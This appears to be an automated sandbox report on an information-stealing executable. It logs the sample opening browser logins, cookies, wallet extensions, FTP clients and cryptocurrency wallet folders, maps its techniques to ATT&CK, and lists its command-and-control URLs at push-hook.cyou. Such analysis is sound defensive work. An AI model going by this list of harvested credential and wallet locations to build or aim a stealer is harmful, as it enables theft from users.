          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4348, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4348, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation
          1
          DLL Side-Loading
          211
          Process Injection
          11
          Virtualization/Sandbox Evasion
          2
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          211
          Process Injection
          LSASS Memory1
          Query Registry
          Remote Desktop Protocol41
          Data from Local System
          2
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager141
          Security Software Discovery
          SMB/Windows Admin Shares2
          Clipboard Data
          113
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
          Obfuscated Files or Information
          NTDS11
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing
          LSA Secrets1
          Process Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain Credentials11
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe50%ReversingLabsWin32.Trojan.CrypterX
          file.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://push-hook.cyou/m0%Avira URL Cloudsafe
          https://push-hook.cyou/0%Avira URL Cloudsafe
          https://push-hook.cyou/api0%Avira URL Cloudsafe
          https://push-hook.cyou:443/apiion.txtPK0%Avira URL Cloudsafe
          https://push-hook.cyou:443/apiB0%Avira URL Cloudsafe
          https://push-hook.cyou/ul0%Avira URL Cloudsafe
          https://push-hook.cyou:443/api0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          push-hook.cyou
          172.67.161.207
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://push-hook.cyou/apitrue
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabfile.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://push-hook.cyou/ulfile.exe, 00000002.00000003.1796762781.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1795461252.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1795020611.00000000052D0000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://duckduckgo.com/ac/?q=file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgfile.exe, 00000002.00000003.1797089604.00000000052C9000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://push-hook.cyou:443/apifile.exe, 00000002.00000003.1933303365.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2026924995.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://push-hook.cyou/mfile.exe, 00000002.00000003.1824145781.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1824111584.0000000002C77000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000002.00000003.1797089604.00000000052C9000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctafile.exe, 00000002.00000003.1819472379.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1818772124.00000000052C8000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://ocsp.rootca1.amazontrust.com0:file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000002.00000003.1773096667.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1749238502.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1772986739.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1749111878.0000000005363000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000002.00000003.1773096667.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1749238502.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1772986739.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1749111878.0000000005363000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.ecosia.org/newtab/file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://push-hook.cyou:443/apiBfile.exe, 00000002.00000003.1933303365.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2026924995.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000002.00000003.1796826342.00000000053EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://push-hook.cyou:443/apiion.txtPKfile.exe, 00000002.00000003.1933303365.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2026924995.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://push-hook.cyou/file.exe, file.exe, 00000002.00000003.1845901808.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1845755273.0000000002C64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1772973450.00000000052CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1933464874.0000000002C54000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748540351.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1933464874.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1772916719.00000000052C6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1933303365.0000000002C07000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2027006243.0000000002C54000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748488055.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1773036075.00000000052CB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.2027006243.0000000002C46000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000002.00000003.1819472379.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1818772124.00000000052C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000002.00000003.1797089604.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1819472379.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1818772124.00000000052C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.c.lencr.org/0file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000002.00000003.1749238502.00000000052F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.microsoffile.exe, 00000002.00000003.1749111878.0000000005365000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000002.00000003.1749238502.00000000052F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000002.00000003.1796826342.00000000053EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94file.exe, 00000002.00000003.1819472379.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1818772124.00000000052C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
